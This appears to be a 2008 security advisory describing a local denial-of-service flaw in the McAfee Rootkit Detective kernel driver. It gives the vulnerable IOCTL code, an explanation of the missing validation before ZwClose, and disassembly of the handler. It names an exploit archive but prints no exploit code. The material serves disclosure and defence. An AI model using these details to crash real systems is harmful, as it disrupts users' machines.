Advisory NTIADV0804 (Accelerated Disclosure)
McAfee Rootkit Detective (Rootkit_Detective.sys) Denial of Service Vulnerability
VendorMcAfee, Inc.
Affected SoftwareMcAfee Rootkit Detective < = 1.1
Affected DriverRootkit_Detective.sys
Date Reported2008-09-18
Release Date2008-10-18
StatusNot fixed
ExploitRootkit_Deactive_DoS.zip - Local Denial of Service Exploit - ZwClose
Disclosure Timeline2008-09-18 - Vulnerability reported to vendor
2008-10-03 - Vendor notified a second time
2008-10-18 - Full technical details released to general public
Description
The kernel driver Rootkit_Detective.sys shipped with McAfee Rootkit Detective contains a vulnerability in the code that handles IOCTL (0x2A7B8040) request. Once loaded, the vulnerable kernel module will be accessible by all users, and will remain loaded until the system is rebooted.
Details
An attacker can close any handle by supplying a specially crafted Irp to the IOCTL handler function. The device driver fails to validate user supplied parameter passed to IOCTL (0x2A7B8040) and allows to call ZwClose function directly. If user supplied handle will be passed to the vulnerable handler function with adjusted ProtectFromClose attribute ZwClose will couse BSoD (INVALID_KERNEL_HANDLE). 


		.text:00019137 @@ioctl_close_handle:
		.text:00019137                 push    4
		.text:00019139                 pop     esi
		.text:0001913A                 cmp     ecx, esi                       ; InputBufferLength
		.text:0001913C                 jb      @@invalid_buffer_size
		.text:00019142                 test    edi, edi                       ; SystemBuffer
		.text:00019144                 jz      @@invalid_buffer_size
		.text:0001914A                 push    edi
		.text:0001914B                 call    ds:MmIsAddressValid
		.text:00019151                 test    al, al
		.text:00019153                 jz      @@return
		.text:00019159                 push    dword ptr [edi]                ; SystemBuffer[0]
		.text:0001915B                 call    CloseHandle
		...
		

		.text:00011F98 ; int __stdcall CloseHandle(int Handle)
		.text:00011F98 CloseHandle proc near
		.text:00011F98
		.text:00011F98 Handle = dword ptr  8
		.text:00011F98
		.text:00011F98                 mov     edi, edi
		.text:00011F9A                 push    ebp
		.text:00011F9B                 mov     ebp, esp
		.text:00011F9D                 cmp     [ebp+Handle], 0FFFFFFFFh
		.text:00011FA1                 mov     eax, STATUS_INVALID_HANDLE
		.text:00011FA6                 jz      short @@exit
		.text:00011FA8                 push    [ebp+Handle]
		.text:00011FAB                 call    ds:ZwClose
		.text:00011FB1                 test    eax, eax
		.text:00011FB3                 jl      short @@exit
		.text:00011FB5                 xor     eax, eax
		.text:00011FB7
		.text:00011FB7 @@exit:
		.text:00011FB7                 pop     ebp
		.text:00011FB8                 retn    4
		.text:00011FB8 CloseHandle endp
Copyright © 2oo8-2oo9 NT Internals. All rights reserved.